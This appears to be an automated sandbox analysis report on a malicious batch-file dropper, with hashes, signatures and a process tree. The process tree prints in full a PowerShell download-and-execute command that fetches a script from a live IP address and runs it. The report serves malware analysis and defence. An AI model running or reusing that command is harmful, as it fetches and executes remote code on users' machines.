Analysis
- max time kernel: 112s
- max time network: 150s
- platform: windows10_x64
- resource: win10v200217
- submitted: 03-03-2020 22:10
Static task: static1
Behavioral task: behavioral1
  Sample: Y3Jy2jds.bat
  Resource: win7v200217 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: Y3Jy2jds.bat
  Resource: win10v200217 (windows10_x64)
  0 signatures, 0 seconds
General
- Target: Y3Jy2jds.bat
- Size: 198B
- MD5: 8b67c908fe9a32e3673e14da0303625e
- SHA1: a9c21d20b5847e81b372f00b0147b6cbabcfb143
- SHA256: 1dfa60cb96d3c4ed546f6106ab753fddd1c91516a748a7992b4aa3139531e2dc
- SHA512: ec6df17d0937af862574c904802b467284695421f411846032aec4c3fdd703b40f1eeb9498456c0242f588052f5db19f384ac6eeb4555f6d2d01fec6365f6e9e
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/Y3Jy2jds
Signatures
- Program crash (1 IoC)
  Processes (pid / pid_target / process / target process):
    3892 / 3888 / WerFault.exe / powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description / pid / process):
    Token: SeRestorePrivilege / 3892 / WerFault.exe
    Token: SeBackupPrivilege / 3892 / WerFault.exe
    Token: SeDebugPrivilege / 3892 / WerFault.exe
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes (pid / process):
    3892 / WerFault.exe (same entry repeated 14 times)
Processes
1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Y3Jy2jds.bat"
   PID: 3864
2. (child of 1) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
   Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Y3Jy2jds');Invoke-SIZYOFNVCRJOTWT;Start-Sleep -s 10000"
   PID: 3888
3. (child of 2) C:\Windows\SysWOW64\WerFault.exe
   Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3888 -s 704
   Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
   PID: 3892